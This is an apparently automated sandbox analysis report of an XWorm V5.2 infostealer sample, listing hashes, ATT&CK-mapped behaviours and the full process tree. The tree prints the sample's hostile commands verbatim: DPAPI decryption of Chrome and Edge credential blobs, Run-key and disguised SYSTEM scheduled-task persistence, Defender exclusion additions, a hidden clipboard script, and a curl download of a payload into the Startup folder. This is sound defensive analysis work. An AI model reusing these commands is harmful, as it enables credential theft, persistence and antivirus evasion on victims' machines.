1180b5ce40dfeadc5843448e0f163408aa33f23abe39030d5eecaf37fc17d551

Analysis

max time kernel
34s
max time network
46s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
09/09/2024, 15:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XWorm V5.2.exe
Size

37.7MB
MD5

4d2fe88411ca382a705f7de70505f8ee
SHA1

992be069e1123ea68a414ce462f2b7a0e5c39563
SHA256

1180b5ce40dfeadc5843448e0f163408aa33f23abe39030d5eecaf37fc17d551
SHA512

8df4399dc43b854fd72764b426146044799aaea80a07dbecf4d28941b957af1b480ade452fd020912c37b54280a057f02be19c10812f59ab3b8f2d45c0a82b43
SSDEEP

786432:V3on1HvSzxAMNwFZArYsHPv697OZYV797:VYn1HvSpNwXmvYJX

Score

9^/10

collection credential_access defense_evasion discovery execution persistence spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2816	powershell.exe
1300	powershell.exe
4020	powershell.exe
944	powershell.exe
3540	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	XWorm V5.2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	cscript.exe

Clipboard Data 1 TTPs 1 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1840	cmd.exe

Loads dropped DLL 1 IoCs

pid	Process
4976	XWorm V5.2.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\fLViPrCntulUySs.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XWorm V5.2.exe"	reg.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
1840	cmd.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	api.ipify.org

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
4012	cmd.exe
3576	cmd.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
400	tasklist.exe
4328	tasklist.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1792	WMIC.exe
2700	WMIC.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
4428	reg.exe
1164	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4388	schtasks.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
944	powershell.exe
944	powershell.exe
4952	powershell.exe
4952	powershell.exe
1932	powershell.exe
1932	powershell.exe
2816	powershell.exe
2816	powershell.exe
2816	powershell.exe
1300	powershell.exe
1300	powershell.exe
1300	powershell.exe
4020	powershell.exe
4020	powershell.exe
4020	powershell.exe
4328	powershell.exe
4328	powershell.exe
4328	powershell.exe
3608	powershell.exe
3608	powershell.exe
3540	powershell.exe
3540	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	944	powershell.exe
Token: SeDebugPrivilege	400	tasklist.exe
Token: SeDebugPrivilege	4328	tasklist.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeIncreaseQuotaPrivilege	4372	WMIC.exe
Token: SeSecurityPrivilege	4372	WMIC.exe
Token: SeTakeOwnershipPrivilege	4372	WMIC.exe
Token: SeLoadDriverPrivilege	4372	WMIC.exe
Token: SeSystemProfilePrivilege	4372	WMIC.exe
Token: SeSystemtimePrivilege	4372	WMIC.exe
Token: SeProfSingleProcessPrivilege	4372	WMIC.exe
Token: SeIncBasePriorityPrivilege	4372	WMIC.exe
Token: SeCreatePagefilePrivilege	4372	WMIC.exe
Token: SeBackupPrivilege	4372	WMIC.exe
Token: SeRestorePrivilege	4372	WMIC.exe
Token: SeShutdownPrivilege	4372	WMIC.exe
Token: SeDebugPrivilege	4372	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4372	WMIC.exe
Token: SeRemoteShutdownPrivilege	4372	WMIC.exe
Token: SeUndockPrivilege	4372	WMIC.exe
Token: SeManageVolumePrivilege	4372	WMIC.exe
Token: 33	4372	WMIC.exe
Token: 34	4372	WMIC.exe
Token: 35	4372	WMIC.exe
Token: 36	4372	WMIC.exe
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeIncreaseQuotaPrivilege	4372	WMIC.exe
Token: SeSecurityPrivilege	4372	WMIC.exe
Token: SeTakeOwnershipPrivilege	4372	WMIC.exe
Token: SeLoadDriverPrivilege	4372	WMIC.exe
Token: SeSystemProfilePrivilege	4372	WMIC.exe
Token: SeSystemtimePrivilege	4372	WMIC.exe
Token: SeProfSingleProcessPrivilege	4372	WMIC.exe
Token: SeIncBasePriorityPrivilege	4372	WMIC.exe
Token: SeCreatePagefilePrivilege	4372	WMIC.exe
Token: SeBackupPrivilege	4372	WMIC.exe
Token: SeRestorePrivilege	4372	WMIC.exe
Token: SeShutdownPrivilege	4372	WMIC.exe
Token: SeDebugPrivilege	4372	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4372	WMIC.exe
Token: SeRemoteShutdownPrivilege	4372	WMIC.exe
Token: SeUndockPrivilege	4372	WMIC.exe
Token: SeManageVolumePrivilege	4372	WMIC.exe
Token: 33	4372	WMIC.exe
Token: 34	4372	WMIC.exe
Token: 35	4372	WMIC.exe
Token: 36	4372	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1904	WMIC.exe
Token: SeSecurityPrivilege	1904	WMIC.exe
Token: SeTakeOwnershipPrivilege	1904	WMIC.exe
Token: SeLoadDriverPrivilege	1904	WMIC.exe
Token: SeSystemProfilePrivilege	1904	WMIC.exe
Token: SeSystemtimePrivilege	1904	WMIC.exe
Token: SeProfSingleProcessPrivilege	1904	WMIC.exe
Token: SeIncBasePriorityPrivilege	1904	WMIC.exe
Token: SeCreatePagefilePrivilege	1904	WMIC.exe
Token: SeBackupPrivilege	1904	WMIC.exe
Token: SeRestorePrivilege	1904	WMIC.exe
Token: SeShutdownPrivilege	1904	WMIC.exe
Token: SeDebugPrivilege	1904	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1904	WMIC.exe
Token: SeRemoteShutdownPrivilege	1904	WMIC.exe
Token: SeUndockPrivilege	1904	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4976 wrote to memory of 428	4976	XWorm V5.2.exe	87
PID 4976 wrote to memory of 428	4976	XWorm V5.2.exe	87
PID 428 wrote to memory of 5068	428	cmd.exe	88
PID 428 wrote to memory of 5068	428	cmd.exe	88
PID 428 wrote to memory of 944	428	cmd.exe	89
PID 428 wrote to memory of 944	428	cmd.exe	89
PID 944 wrote to memory of 4876	944	powershell.exe	91
PID 944 wrote to memory of 4876	944	powershell.exe	91
PID 4876 wrote to memory of 4476	4876	csc.exe	92
PID 4876 wrote to memory of 4476	4876	csc.exe	92
PID 4976 wrote to memory of 3476	4976	XWorm V5.2.exe	93
PID 4976 wrote to memory of 3476	4976	XWorm V5.2.exe	93
PID 4976 wrote to memory of 5084	4976	XWorm V5.2.exe	94
PID 4976 wrote to memory of 5084	4976	XWorm V5.2.exe	94
PID 5084 wrote to memory of 400	5084	cmd.exe	95
PID 5084 wrote to memory of 400	5084	cmd.exe	95
PID 3476 wrote to memory of 952	3476	cmd.exe	96
PID 3476 wrote to memory of 952	3476	cmd.exe	96
PID 4976 wrote to memory of 3600	4976	XWorm V5.2.exe	98
PID 4976 wrote to memory of 3600	4976	XWorm V5.2.exe	98
PID 4976 wrote to memory of 4012	4976	XWorm V5.2.exe	99
PID 4976 wrote to memory of 4012	4976	XWorm V5.2.exe	99
PID 4012 wrote to memory of 4952	4012	cmd.exe	100
PID 4012 wrote to memory of 4952	4012	cmd.exe	100
PID 3600 wrote to memory of 4328	3600	cmd.exe	101
PID 3600 wrote to memory of 4328	3600	cmd.exe	101
PID 4976 wrote to memory of 3576	4976	XWorm V5.2.exe	102
PID 4976 wrote to memory of 3576	4976	XWorm V5.2.exe	102
PID 3576 wrote to memory of 1932	3576	cmd.exe	103
PID 3576 wrote to memory of 1932	3576	cmd.exe	103
PID 4976 wrote to memory of 3996	4976	XWorm V5.2.exe	104
PID 4976 wrote to memory of 3996	4976	XWorm V5.2.exe	104
PID 4976 wrote to memory of 3792	4976	XWorm V5.2.exe	105
PID 4976 wrote to memory of 3792	4976	XWorm V5.2.exe	105
PID 4976 wrote to memory of 4380	4976	XWorm V5.2.exe	106
PID 4976 wrote to memory of 4380	4976	XWorm V5.2.exe	106
PID 4976 wrote to memory of 1840	4976	XWorm V5.2.exe	108
PID 4976 wrote to memory of 1840	4976	XWorm V5.2.exe	108
PID 3996 wrote to memory of 4372	3996	cmd.exe	107
PID 3996 wrote to memory of 4372	3996	cmd.exe	107
PID 1840 wrote to memory of 2816	1840	cmd.exe	109
PID 1840 wrote to memory of 2816	1840	cmd.exe	109
PID 4380 wrote to memory of 4388	4380	cmd.exe	110
PID 4380 wrote to memory of 4388	4380	cmd.exe	110
PID 4976 wrote to memory of 4524	4976	XWorm V5.2.exe	112
PID 4976 wrote to memory of 4524	4976	XWorm V5.2.exe	112
PID 4524 wrote to memory of 3112	4524	cmd.exe	113
PID 4524 wrote to memory of 3112	4524	cmd.exe	113
PID 4976 wrote to memory of 412	4976	XWorm V5.2.exe	114
PID 4976 wrote to memory of 412	4976	XWorm V5.2.exe	114
PID 412 wrote to memory of 1904	412	cmd.exe	115
PID 412 wrote to memory of 1904	412	cmd.exe	115
PID 3112 wrote to memory of 1944	3112	cscript.exe	116
PID 3112 wrote to memory of 1944	3112	cscript.exe	116
PID 2816 wrote to memory of 3912	2816	powershell.exe	118
PID 2816 wrote to memory of 3912	2816	powershell.exe	118
PID 3912 wrote to memory of 4536	3912	csc.exe	119
PID 3912 wrote to memory of 4536	3912	csc.exe	119
PID 1944 wrote to memory of 1300	1944	cmd.exe	120
PID 1944 wrote to memory of 1300	1944	cmd.exe	120
PID 4976 wrote to memory of 1920	4976	XWorm V5.2.exe	121
PID 4976 wrote to memory of 1920	4976	XWorm V5.2.exe	121
PID 1920 wrote to memory of 524	1920	cmd.exe	153
PID 1920 wrote to memory of 524	1920	cmd.exe	153

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
    3⤵
    PID:5068
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -noprofile -
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:944
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nh1y3ziu\nh1y3ziu.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4876
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7FBF.tmp" "c:\Users\Admin\AppData\Local\Temp\nh1y3ziu\CSC74DE58826678436387CF4891271BA99.TMP"
        5⤵
        
        PID:4476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3476
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5084
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3600
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:4328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,57,87,11,87,254,65,110,77,188,204,169,16,188,62,171,189,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,254,33,137,177,235,50,182,20,81,71,143,26,227,205,89,196,240,80,196,222,21,156,80,97,105,113,161,9,98,115,51,158,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,43,8,25,245,219,66,165,39,134,60,176,136,236,243,209,73,137,143,250,180,241,246,190,236,128,2,126,40,240,229,10,145,48,0,0,0,156,243,29,117,250,184,13,93,102,181,9,212,190,202,73,37,247,246,190,19,121,110,7,4,155,70,87,154,232,235,107,223,181,174,244,140,209,239,140,6,5,187,215,220,105,18,21,103,64,0,0,0,4,74,51,195,112,34,198,233,219,135,56,111,144,11,66,229,181,196,164,135,1,247,222,63,169,213,206,118,61,188,8,69,213,132,2,178,108,186,120,244,105,96,50,170,73,23,190,214,136,13,64,247,198,47,14,253,143,253,117,42,80,1,6,248), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:4012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,57,87,11,87,254,65,110,77,188,204,169,16,188,62,171,189,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,254,33,137,177,235,50,182,20,81,71,143,26,227,205,89,196,240,80,196,222,21,156,80,97,105,113,161,9,98,115,51,158,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,43,8,25,245,219,66,165,39,134,60,176,136,236,243,209,73,137,143,250,180,241,246,190,236,128,2,126,40,240,229,10,145,48,0,0,0,156,243,29,117,250,184,13,93,102,181,9,212,190,202,73,37,247,246,190,19,121,110,7,4,155,70,87,154,232,235,107,223,181,174,244,140,209,239,140,6,5,187,215,220,105,18,21,103,64,0,0,0,4,74,51,195,112,34,198,233,219,135,56,111,144,11,66,229,181,196,164,135,1,247,222,63,169,213,206,118,61,188,8,69,213,132,2,178,108,186,120,244,105,96,50,170,73,23,190,214,136,13,64,247,198,47,14,253,143,253,117,42,80,1,6,248), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,57,87,11,87,254,65,110,77,188,204,169,16,188,62,171,189,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,189,235,105,13,230,226,179,234,164,7,77,240,115,231,147,216,38,56,133,37,36,206,37,38,201,19,140,48,232,238,106,184,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,118,170,236,162,75,92,79,39,145,94,82,140,167,251,65,199,8,143,133,113,29,80,221,31,248,166,34,62,97,129,50,100,48,0,0,0,46,137,80,237,156,67,148,47,73,90,97,33,70,249,185,197,89,27,227,86,185,150,42,24,240,243,166,244,41,217,138,208,204,27,38,38,110,64,50,108,188,191,119,211,255,232,40,188,64,0,0,0,41,143,84,6,127,25,219,124,207,140,89,129,98,187,233,102,232,113,181,71,95,6,121,220,0,124,241,59,121,6,17,73,184,105,105,153,107,23,51,31,29,92,33,56,43,160,205,172,173,161,221,201,12,38,71,198,248,147,146,131,103,213,208,194), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:3576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,57,87,11,87,254,65,110,77,188,204,169,16,188,62,171,189,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,189,235,105,13,230,226,179,234,164,7,77,240,115,231,147,216,38,56,133,37,36,206,37,38,201,19,140,48,232,238,106,184,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,118,170,236,162,75,92,79,39,145,94,82,140,167,251,65,199,8,143,133,113,29,80,221,31,248,166,34,62,97,129,50,100,48,0,0,0,46,137,80,237,156,67,148,47,73,90,97,33,70,249,185,197,89,27,227,86,185,150,42,24,240,243,166,244,41,217,138,208,204,27,38,38,110,64,50,108,188,191,119,211,255,232,40,188,64,0,0,0,41,143,84,6,127,25,219,124,207,140,89,129,98,187,233,102,232,113,181,71,95,6,121,220,0,124,241,59,121,6,17,73,184,105,105,153,107,23,51,31,29,92,33,56,43,160,205,172,173,161,221,201,12,38,71,198,248,147,146,131,103,213,208,194), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
  2⤵
  PID:3792
- - C:\Windows\system32\reg.exe
    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
    3⤵
    PID:1412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4380
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
  2⤵
  - Clipboard Data
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:1840
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2816
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\avrlft3j\avrlft3j.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3912
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES881C.tmp" "c:\Users\Admin\AppData\Local\Temp\avrlft3j\CSC87C3F6CE2B134931B8302F8ACD14F9C4.TMP"
        5⤵
        
        PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4524
- - C:\Windows\system32\cscript.exe
    cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1944
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1300
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4020
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe" /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:4428
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
        5⤵
        Modifies registry key
        
        PID:1164
    - - C:\Windows\system32\curl.exe
        
        curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
        5⤵
        
        PID:2024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_computersystemproduct get uuid
    3⤵
    PID:524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
  2⤵
  PID:4324
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Description,PNPDeviceID
    3⤵
    PID:2996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
  2⤵
  PID:2264
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic memorychip get serialnumber
    3⤵
    PID:2400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:1924
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:2480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
  2⤵
  PID:1232
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get processorid
    3⤵
    PID:1424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
  2⤵
  PID:1764
- - C:\Windows\system32\getmac.exe
    getmac /NH
    3⤵
    PID:220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:5044
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2156
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4376
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:5092
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2084
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2364
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4892
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3196
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1332
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
